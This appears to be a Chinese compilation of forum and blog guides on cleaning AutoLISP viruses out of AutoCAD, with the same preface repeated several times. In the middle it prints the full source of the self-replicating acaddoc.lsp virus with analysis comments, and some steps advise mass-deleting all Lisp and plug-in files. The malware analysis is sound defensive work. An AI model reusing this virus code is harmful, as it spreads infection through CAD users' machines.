AUTOCAD病毒的清除方法acaddoc.lsp和acadapq.lsp

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为，360杀毒软件查出病毒名为。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。

如果CAD 鼠标中键不能平移，而是弹出下拉菜单，修改系统变量mbuttonpan的值为1，重新打开CAD后鼠标中键还是一样不能平移，有什么方法能够恢复原来的中键平移功能呢？1、清除LSP病毒文件说明该病毒是以前那个炸开命令不能使用病毒的变种，它修改了这4个系统变量的值。

(setvar "zoomfactor" 12)(setvar"mbuttonpan" 0)(setvar"HIGHLIGHT" 0)(setvar "fillmode" 0)这4个系统变量的默认值是：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)（系统变量的相关说明请打开CAD后按F1键查看帮助文档。

）它不像以前的病毒那样，让一些命令无法使用，而是修改了几个系统变量使我们的操作不方便。

它的传播方式跟以前一样，只能在CAD支持路径和打开DWG文件时传播。

大家可以试试下面的方法：①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40）(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

常见AutoCAD病毒（acad.fas、acad.lsp）清除方法没有删除干净吧。

“CAD恶意程序”网上也称之为“CAD病毒”。

其实，常见的CAD恶意程序并不具备一般病毒特征，不能单独传染，不会感染系统文件，只能在CAD环境下传播，没有对系统产生危害，但会造成CAD 部份命令失效（如：无法使用分解命令、鼠标中键平移被修改、填充不能使用、多段线空心等），使其操作不便，从而影响制图效率及质量。

CAD恶意程序清除工具，支持CAD2002-2010版本。

程序根据“病毒及信任文件”列表搜索、删除CAD恶意程序并清除其加载项。

大家在工作中，打开自己或别人拷贝来的DWG文件前，不要忙着打开CAD，先看看这个DWG图纸目录内，有没有acad.lsp、acad.fas和acad.vlx这些的文件，有就应该立即清除该文件。

这样可以大大减少“CAD恶意程序”传播的机会。

手工清除方法：①、关闭CAD（一定要关闭正在运行中的CAD程序）；②、按F3键或在“开始”菜单打开“搜索”→“文件或文件夹”搜索窗口，全盘搜索下面的已知可能是CAD恶意程序的文件名；acad.lspacad.fasacad.vlxacad.sysacaddoc.lspacadiso.lspacaddoc.fasacadapq.lspacadappp.lspacadapp.lsplcm.fasacadsmu.fas搜索发现文件后，注意该文件的所在目录，判断这个文件是不是你正在使用的某些外挂插件或专业软件所用到的自动加载文件，再决定是否删除。

注意：“搜索范围”一定要选择“本地硬盘(C:;D:;E:;...)”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”和“搜索子文件夹”项都勾选上，否则不能完全搜索出这些文件。

③、复制代码“(setvar "zoomfactor" 40)(setvar "mbuttonpan"1)(setvar "highlight" 1)(se tvar "fillmode" 1)(setvar "pickauto" 1)”粘贴在CAD命令行，恢复被修改的系统变量；④、清除残留的加载项，复制“(startapp "notepad" (findfile "acad.mnl"))”在CAD命令行，打开“acad.mnl”文件，查看文件内是否有类似“(load "acadappp")”或“(load "acadappp.lsp")”这样的内容，有则删去这些内容后保存“acad.mnl”文件；无可忽略此操作。

天正CAD产生的acaddoc.lsp病毒怎么解决①、关闭CAD（一定要先关闭正在运行的CAD程序）。

②、进入安全模式（重要前提！！！），按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp 这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

③、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件，将文件最后一行代码(load "acadappp")删去。

(错误: LOAD 失败: "acadapq")的根源。

(如“acad.mnl”文件中无此行代码可忽略此操作)附：“acad.mnl”文件可能在下面的目录中，C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD200×\R×.×\chs\Support其中×××是你登录系统时的用户名，200×和R×.×分别是CAD的版本和版本代号。

（注意：目录C:\Documents and Settings\是系统隐藏文件夹）acaddoc.lsp病毒有效的方法。

1:查找acaddoc.lsp，把高级选项打开，把隐藏的也搜索出来删除。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

cad病毒及解决办法
打开CAD文件时总是出来类似以下的莫名其妙的提示：未知命令“THISDRAWING.HH”…正在初始化VBA…初始错误…
并且每次打开文件后会在相应文件路径下生成一个文件“acaddoc.lsp”。

一定是病毒！于是到网上搜啊搜，终于找到了解决办法！
先到这里下载一个压缩包。

然后搜索所有分区里名为“acaddoc.lsp”的文件，全部删除！注意显示隐藏文件及文件夹。

接下来将下载好的压缩包里的两个文件“acaddoc.lsp”和“acadapq.lsp”复制到路径：
C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 200*\R*\chs\Support
或者你的CAD安装目录下的support文件夹下，直接覆盖文件即可。

方法二:推荐使用
按F3键打开XP系统的文件搜索窗口，搜索并删除acad.lsp、acadappp.lsp、acadapp.lsp acadapq.lsp 、acaddoc.lsp这5个文件。

注意：“搜索范围”一定要选择“本机硬盘驱动器...”，并勾选“搜索选项”中的“高级选项”，将其下的“搜索子文件夹”项勾选上，否则不能将这3个文件全部搜索清除干净。

CAD病毒通用杀毒方法杀毒方法：1.利用命令来清除病毒：使用打开CAD程序,在命令行输入:(复制到命令行即可)(while(or(setq a (findfile”acad.fas”))(setq a (findfile”lcm.fas”)))(vl-file-delete a))也就是要搜索并删除acad.fas和lcm.fas。

2、直接搜索acad.fas和lcm.fas，找到的话删除掉，然后再启动CAD第一种方法：将硬盘、u盘、移动硬盘、网络共享文件夹中的.fas .lsp .mnl .arx等类型文件全部删除即可。

具体方法如下：1、关闭CAD。

2、卸载CAD，然后删除CAD所在文件夹。

3、打开“我的电脑”—>点“搜索”（或者按CTRL+F)—>”要搜索的文件或文件夹名”里输入*.fas，*.lsp，*.mnl，*.arx—>点“立即搜索”。

4、将搜索到的所有文件全部删除。

同理方法，搜索自己的U盘，移动硬盘，网络文件夹等。

5、注意压缩包内是否有此类文件。

同上方法搜索 *.RAR *.ZIP 看你打包的图纸文件内是否包有上述类型文件，有就删除。

6、重新安装AutoCAD和其平台上辅助软件即可。

第二种方法：1、关闭CAD。

2、搜索acad*.lsp,acad*.fas,acad*.vlx，如果有很多此类文件，尤其是在图纸目录下有此类文件，将相同大小的文件删除，要彻底一些的话可以将这些文件全部删除。

3、启动CAD，看是否恢复正常，如果仍不正常，则需要用第一种方法。

方法评价：如果你安装了在AutoCAD上的专业软件，这种方法可能会导致专业软件无法正常启动，需要重新安装。

三、关于此类问题的预防：1、如果看到图纸文件夹内除了DWG文件外，还有.fas .lsp .mnl .arx类型文件，如果不明其用途，一定要删除，拷贝别人图纸的时候，注意别把它们拷贝过来。

通俗的讲，只要不拷贝这类文件，99%不会中毒。

AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒，在CAD软件使用中主要表现的情况如下：1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法：关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤：没有处理acad.mnl文件，这样的清除并不彻底，下次再打开带毒的dwg文件（这里并非指dwg文件本身带毒，而是指在该dwg文件下有acaddoc.lsp文件存在）后，系统又会感染病毒，偶曾经对这个cad病毒的代码做过详细分析，下面是原文，有兴趣的朋友可以详细看看：最近自己的电脑中了CAD病毒，症状为打开一个dwg文件后，在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件，即使手工将其删除，下次打开dwg文件时又会自动生成。

如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上，只要一打开该dwg文件，则该电脑就会被感染。

因为这个CAD病毒是个lisp程序，花了些时间对病毒代码进行分析如下：-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名，这句没有用处，下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄，c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开，不存在则创建，然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏，但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志，已感染为1，未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄，若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容，读取结束后，wns1中是倒数第2行(setq wns1 wns2 ) ;内容，wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志，;;; ;已感染为1，未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄，若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容，读取结束后，wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”，若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染，则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法，等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容，在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else （acad.mnl文件已感染）(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容，写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else （若加载的是support目录下的acaddoc.lsp文件）(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件，将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法，没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知，该病毒的病毒文件有2个，一个为acadapq.lsp，位于ACAD 安装目录下的support目录下，另一个为acaddoc.lsp，位于当前打开的dwg文件所在目录下，2个病毒文件的内容相同。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

方法一acaddoc.lsp输入的列表有缺陷（转自LOVE空间）2009年04月07日星期二上午 11:14这个是个新病毒，用以往的解决方法（ 1.lps改名为acaddoc.lsp替换）无法解决，在网络搜索了一下看到百度空间有个帖子有相关解决办法。

原帖如下：今天在Q群里又见网友请求删除CAD病毒，说用专杀工具也无法解决，于是让他把病毒文件传了给我。

打开文件一看，发现这个“acaddoc.lsp”文件内的程序代码跟以往的“acaddoc.lsp”病毒文件不同。

该病毒文件自动搜索CAD支持路径下的所有“*.mnl”文件和“*.lsp”文件。

将病毒代码（“acaddoc.lsp”文件内容）写入“*.lsp”文件内，并在“*.mnl”文件中写入“*.lsp”文件的加载路径。

同时，直线命令“line”、外部参照管理命令“xref”和分解（炸开）命令“explode”无法使用。

CAD系统感染该病毒文件后，只是简单搜索删除“acaddoc.lsp”文件，不能清除病毒。

因为所有的“*.lsp”文件已经被修改，所有“*.lsp”文件都是病毒文件。

解决方法壹：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）后，重新安装CAD解决方法贰：①、关闭CAD②、搜索并刪除所有“acaddoc.lsp”文件③、找一台没有被CAD病毒破坏、且安装有相同版本CAD的电脑，复制其所有“*.lsp”文件和“*.mnl”文件至本机覆盖原文件（包括C盘用户目录内的相关文件）预防CAD病毒：装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，可以减少中毒的机率。

（此法99.999%有效）附：×××\Application Data\Autodesk\AutoCAD 200×\R×.×\ 其中×××是你登录系统时的用户名， 200×和R×.×分别是CAD的版本和版本代号。

acad.lsp，acaddoc.lsp，acadapp.lsp和acadiso.lsp病毒的查杀方法1.为了保证操作的完善，在做下面的操作以前最好先把CAD和天正的程序完全卸载，卸载完成后手动删掉程序文件夹下剩余的文件。

2.点取桌面上“我的电脑”图标，按键盘“ctrl+F”键，显示如下图所示面板（下面这个图是在我机子上截的）：注意左边几个打红圈的地方，如果你机子上“更多高级选项”旁边的箭头是向下的，需要点一下箭头，让它变成如图所示的形状，此时下边会打开下级选项，注意最下面一个红圈中三个打勾的地方，在你那儿也要打上勾。

然后在最上面一个红圈的位置处输入需要搜索的文件名，一共有四个文件需要搜索，分别是acad.lsp，acaddoc.lsp，acadapp.lsp和acadiso.lsp，因为每次只能搜索一个文件，所以得重复四遍这个搜索过程，最后把搜出来的文件全部删除。

3.如果个别文件系统不让删的话，可以把电脑重启，然后按F8进入安全模式下删除。

4.待所有的病毒文件全部删干净后再重装CAD以及天正的程序。

5.如果中毒不是很深，即单独启动纯CAD平台程序时命令行并没有任何错误提示，则可以不用重新卸载安装CAD程序，只需要把天正卸载重装即可。

注意：1.病毒之所以称之为病毒，除了它带来一些负面影响以外，还因为它具有一定的传染性，所以查杀病毒这个操作最好是一整个设计单位找个时间大家统一清理一下，即所有的电脑同时进行杀毒的这个操作，否则因为内部的图纸交流，本来已经杀过病毒的电脑可能会再次感染病毒。

2.处理完病毒后以后，传图纸的时候最好只传一张张的DWG图纸，而不要传压缩文件或直接拷贝整个文件夹。

3.网上随便搜一下也能搜到一些CAD病毒的专杀工具，在可能的情况可以下下来试试，有些还是有一定效果的。

前言: 最近本人公司里流行一种CAD病毒，中毒后，CAD每次新开图均生成一个acaddoc.lsp的病毒文件，虽破坏力不大，但烦不胜烦。

经研究病毒源码后，摸索出了一套清除该病毒的办法。

然后经过在数个同事机器上验证，该方法行之有效。

于是将杀毒方法成文，群发给部门同事，以下是原文。

一病毒简介:最近公司里流传一种cad病毒。

该病毒可被卡巴斯基和360杀毒软件查出。

卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a，360杀毒软件查出病毒名为Trojan.Script.29327。

遗憾的是，卡巴斯基和360杀毒软件均不能将其彻底清除。

二中毒症状：机器中毒后，运行CAD时，每打开一个dwg文件，均在dwg文件所在目录下生成一个acaddoc.lsp的文件。

由于每次开图，病毒程序均进行一次病毒传播复制过程，因此使得CAD开图时速度变慢。

用记事本查看CAD安装路径下的support目录下的任一*.lsp文件，如文件末尾含有与附件1相同的代码，则可判定为中毒。

三传播机理：通过分析病毒的源代码，初步了解其传播机理如下：如机器已中毒，CAD新打开dwg文件时，病毒程序自动加载。

并搜索CAD工作目录下的acad.mnl文件，感染同一目录下的*.mnl文件，搜索acad的support目录，并感染该目录下的所有*.lsp文件。

同时病毒在当前打开的dwg文件所在目录下生成acaddoc.lsp文件，以利于下次传播。

如本机未中毒，而新打开的dwg文件所在目录下有acaddoc.lsp文件，则病毒将感染上述目录下的*.mnl与*.lsp文件。

该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。

至于这两个程序会干什么，暂未深入研究。

四清除步骤：1. 退出CAD。

2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件，然后彻底删除上述文件。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。

预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
经参考相关文章并结合自己重新实践总结：
预防CAD病毒并解决CAD病毒“错误: 输入的列表有缺陷”的方法：
1、在关闭CAD情况下。

1.搜索全盘的acaddoc.lsp和acadapq.lsp并删除；2注意要.显示隐藏文件；
2、用360卸载CAD（必须卸载干净，并进入C盘用户目录内删除没有卸载完的CAD文件）包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

3、重新启动，重新安装CAD，打开并激活好。

4、新建两个记事本并分别压缩，把压缩包改名acaddoc.lsp 和acadapq.lsp，再把改完后的acaddoc.lsp和acadapq.lsp覆盖路径C:\Documents and Settings\用户名\Application
Data\Autodesk\AutoCAD 20XX\RXX\chs\Support下相应的文件即可。

5、装好CAD系统后，在没有被病毒感染前，将CAD目录内所有文件的属性设置为只读，包括路径C:\Documents and Settings\用户名\Application Data\Autodesk下的文件夹。

可以减少中毒的机率。

（注：此时打开CAD时可能会出现无法更新的提示，如果这样要重新对安装目录已设置“只读”
试验先，把设置“只读”前的勾号去掉，设置不“只读”，再打开试试没问题了，再设置“只读”。

）。

CAD的病毒文件与杀毒方案方法一：（1）全盘搜索acadapp.*、acadappp.*、acaddoc.*文件，然后彻底删除。

注意查找前在文件夹选项中设置“显示所有文件与文件夹”。

搜索时选择“查找所有文件及文件夹”，然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件及文件夹”。

（2）系统盘根目录下如有boot.dat文件，将其删除。

（3）进入C:\Documents and Settings\用户名\ApplicationData\Autodesk\Autocad20**\R1**\chs\Support目录，用记事本打开该目录下所有*.mnl文件，手动删除与病毒相同的代码（一般在文件末尾），然后保存。

修改后的mnl文件属性改为只读。

（4）进入CAD安装目录下的support目录，将该目录下的所有*.lsp文件同上处理。

方法二：解析ACADDOC.LSP病毒文件与杀毒方案CAD的病毒很多但都大同小异。

现就出现的ACADDOC.LSP病毒进行杀毒。

不用重新安装CAD的办法。

1、发现文件夹中多出ACADDOC.LSP说明你中毒了。

2、关闭CAD程序。

3、全盘查找*.fas *.lsp *.mnl *.arx文件，除了CAD安装目录以外的全部删除。

4、检查CAD安装目录文件的修改时间，把最近的几个文件中的病毒代码删除。

（用记事本打开）5、把CAD安装目录中的所有*.fas *.lsp *.mnl *.arx文件改为只读属性。

说明：1、ACADDOC.LSP病毒感染X:\Program Files\AutoCAD 20**\Support 文件夹下的3d.lsp；3darray.lsp；acad2010.lsp；acad2010doc.lsp；acadinfo.lsp；ai_utils.lsp；attredef.lsp；edge.lsp；mvsetup.lsp；sample-profile-util.lsp文件。

CAD病毒查杀方法教程怎么手动杀毒病毒无处不在，随时入侵我们电脑，CAD也一样，那CAD文件病毒怎么清除?本文就来教大家使用手动设置查杀CAD病毒的方法，具体步骤请看下文。

CAD病毒查杀方法介绍：手动查杀CAD病毒：1、关闭CAD(一定要先关闭正在运行的CAD程序)。

2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。

3、复制下面的代码在CAD命令行运行，以恢复被修改的系统变量默认值：01(setvar zoomfactor 40)02(setvar mbuttonpan 1)03(setvar HIGHLIGHT 1)04(setvar fillmode 1)复制代码4、用记事本打开CAD下的acad.mnl 文件，将文件最后一行代码(load acadappp )删去。

(如acad.mnl 文件中无此行代码可忽略此操作)附：acad.mnl 文件可能在下面的目录中，C:\Documents and Settings\ \Application Data\Autodesk\AutoCAD 200 \R . \chs\Support其中是你登录系统时的用户名，200 和R . 分别是CAD的版本和版本代号。

(注意：目录C:\Documents and Settings\是系统隐藏文件夹)补充：CAD使用小技巧1、文字镜像如何设置转动与不转动A、在镜像前，输入MIRRTEXT指令B、输入新值0 代表不转动;输入新值1代表转动C、MIRRTEXT指令完成后，输入MI镜像指令就OK了2、CAD的版本转换A、CAD高版本可以打开所有低版本的图纸B、CAD低版本不可以打开高版本的图纸C、高版本转成低版本的方法，直接点击另存为，将文件类型可以改成任意的低版本D、将低版本转换成高版本，就比较复杂了，需要第三方软件，也就是版本转换器。

3、CAD默认保存文件为低版本A、在绘图界面输入OPB、点击打开和保存选项卡C、在文件保存-另存为处选择低版本就可以了4、多段线的合并方法A、输入PE指令B、选择需合并的一条线，输入Y,再接着输入JC、选择所有需要合并的线条，就可以了5.填充无效时的解决办法有的时候填充时会填充不出来，除了系统变量需要考虑外，还需要去OP选项里检查一下。